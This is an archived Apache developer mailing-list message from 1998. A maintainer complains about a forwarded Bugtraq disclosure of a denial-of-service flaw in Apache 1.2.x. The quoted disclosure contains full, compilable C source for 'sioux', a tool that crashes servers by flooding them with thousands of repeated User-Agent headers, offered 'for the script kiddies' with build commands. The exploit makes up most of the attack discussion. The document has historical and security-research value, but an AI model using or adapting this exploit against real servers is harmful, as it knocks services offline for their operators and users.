httpd-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Jim Jagielski <...@jaguNET.com>
Subject Re: Fwd: YA Apache DoS attack
Date Fri, 07 Aug 1998 23:22:31 GMT
Geez... whatta dick. Too lazy to make a note on the bug database
or send Email to security or someone on the group, yet plenty of
time to polish off a complete exploit.

Brian Behlendorf wrote:
> 
> >Delivered-To: brian@HYPERREAL.ORG
> >Approved-By: aleph1@DFW.NET
> >Lines: 176
> >X-Mailer: Gnus v5.3/Emacs 19.34
> >Date:	Fri, 7 Aug 1998 19:04:27 +0200
> >Reply-To: Dag-Erling Coidan Smørgrav <finrod@EWOX.ORG>
> >Sender: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
> >From:	Dag-Erling Coidan Smørgrav <finrod@EWOX.ORG>
> >Subject:      YA Apache DoS attack
> >To:	BUGTRAQ@NETSPACE.ORG
> >
> >There seems to be a simple way of badly DoSing any Apache server. It
> >involved a massive memory leak in the way it handles incoming request
> >headers. I based my exploit on the assumption that they use setenv()
> >(which they don't) and that the bug occurs when you send a header that
> >will end up as an environment variable if you request a CGI script
> >(such as User-Agent), but I have since verified that there is no
> >connection there. Anyway, you can blow Apache through the roof by
> >sending it tons of headers - the server's memory consumption seems to
> >be a steep polynomial of the amount of data you send it. Below is a
> >snapshot of top(1) about one minute after I sent my server a request
> >with 10,000 copies of "User-Agent: sioux\r\n" (totalling 190,016 bytes
> >of data)
> >
> >---cut---
> >last pid: 29187;  load averages:  1.82,  1.06,  0.68
> 18:21:36
> >82 processes:  2 running, 80 sleeping
> >CPU states: 93.5% user,  0.0% nice,  6.1% system,  0.4% interrupt,  0.0% idle
> >Mem: 82M Active, 5692K Inact, 31M Wired, 4572K Cache, 8349K Buf, 616K Free
> >Swap: 512M Total, 402M Used, 110M Free, 79% Inuse, 5412K In, 748K Out
> >
> >  PID USERNAME PRI NICE  SIZE    RES STATE    TIME   WCPU    CPU COMMAND
> >29176 www      -18   0   392M 85612K swread   0:57  6.83%  6.83% httpd
> >---cut---
> >
> >I know that there are many trivial ways of overloading a web server
> >(e.g. opening tons of connection to eat up file descriptors and
> >process slots), but this one seemed a little extreme, to say the
> >least.
> >
> >Please note that I've only tested this on Apache 1.2.5 and 1.2.6, not
> >on 1.3.1. However, there is no mention of this bug in the change log
> >for 1.3.1, so I'll assume it's vulnerable.
> >
> >BTW, how can the Apache team be stupid enough not to provide a way of
> >submitting problem reports by email? If they did, I'd've sent this to
> >them first and given them a week, but they don't and I'm too friggin'
> >lazy to use their web interface...
> >
> >Here's the 'sploit for the script kiddies. It should compile cleanly
> >and work on most Unices. These are the ones I've tested it on:
> >
> >FreeBSD 2.2.x, FreeBSD 3.0, IRIX 5.3, IRIX 6.2:
> >  gcc -o sioux sioux.c
> >
> >Solaris 2.5.1:
> >  gcc -o sioux sioux.c -lsocket -lnsl
> >
> >
> >---cut---
> >/*-
> > * Copyright (c) 1998 Dag-Erling Coïdan Smørgrav
> > * All rights reserved.
> > *
> > * Redistribution and use in source and binary forms, with or without
> > * modification, are permitted provided that the following conditions
> > * are met:
> > * 1. Redistributions of source code must retain the above copyright
> > *    notice, this list of conditions and the following disclaimer
> > *    in this position and unchanged.
> > * 2. Redistributions in binary form must reproduce the above copyright
> > *    notice, this list of conditions and the following disclaimer in the
> > *    documentation and/or other materials provided with the distribution.
> > * 3. The name of the author may not be used to endorse or promote products
> > *    derived from this software withough specific prior written permission
> > *
> > * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
> > * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
> > * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
> > * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
> > * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
> > * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
> > * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
> > * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
> > * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
> > * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
> > *
> > */
> >
> >/*
> > * Kudos to Mark Huizer who originally suggested this on freebsd-current
> > */
> >
> >#include <sys/types.h>
> >
> >#include <sys/socket.h>
> >#include <netinet/in.h>
> >
> >#include <netdb.h>
> >#include <stdio.h>
> >#include <stdlib.h>
> >#include <string.h>
> >#include <unistd.h>
> >
> >void
> >usage(void)
> >{
> >    fprintf(stderr, "usage: sioux [-a address] [-p port] [-n num]\n");
> >    exit(1);
> >}
> >
> >int
> >main(int argc, char *argv[])
> >{
> >    struct sockaddr_in sin;
> >    struct hostent *he;
> >    FILE *f;
> >    int o, sd;
> >
> >    /* default parameters */
> >    char *addr = "localhost";
> >    int port = 80;
> >    int num = 1000;
> >
> >    /* get options */
> >    while ((o = getopt(argc, argv, "a:p:n:")) != EOF)
> >        switch (o) {
> >        case 'a':
> >            addr = optarg;
> >            break;
> >        case 'p':
> >            port = atoi(optarg);
> >            break;
> >        case 'n':
> >            num = atoi(optarg);
> >            break;
> >        default:
> >            usage();
> >        }
> >
> >    if (argc != optind)
> >        usage();
> >
> >    /* connect */
> >    if ((he = gethostbyname(addr)) == NULL) {
> >        perror("gethostbyname");
> >        exit(1);
> >    }
> >    bzero(&sin, sizeof(sin));
> >    bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
> >    sin.sin_family = he->h_addrtype;
> >    sin.sin_port = htons(port);
> >
> >    if ((sd = socket(sin.sin_family, SOCK_STREAM, IPPROTO_TCP)) == -1) {
> >        perror("socket");
> >        exit(1);
> >    }
> >
> >    if (connect(sd, (struct sockaddr *)&sin, sizeof(sin)) == -1) {
> >        perror("connect");
> >        exit(1);
> >    }
> >
> >    if ((f = fdopen(sd, "r+")) == NULL) {
> >        perror("fdopen");
> >        exit(1);
> >    }
> >
> >    /* attack! */
> >    fprintf(stderr, "Going down like a plague of locusts on %s\n", addr);
> >    fprintf(f, "GET / HTTP/1.1\r\n");
> >    while (num-- && !ferror(f))
> >        fprintf(f, "User-Agent: sioux\r\n");
> >
> >    if (ferror(f)) {
> >        perror("fprintf");
> >        exit(1);
> >    }
> >
> >    fclose(f);
> >    exit(0);
> >}
> >---cut---
> >
> >DES
> >--
> >Dag-Erling Smørgrav -- finrod@ewox.org
> > 
> --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--
> "Common sense is the collection of prejudices  |     brian@apache.org
> acquired by the age of eighteen." - Einstein   |  brian@hyperreal.org
> 


-- 
===========================================================================
   Jim Jagielski   |||   jim@jaguNET.com   |||   http://www.jaguNET.com/
            "That's no ordinary rabbit... that's the most foul,
            cruel and bad-tempered rodent you ever laid eyes on"

Mime
View raw message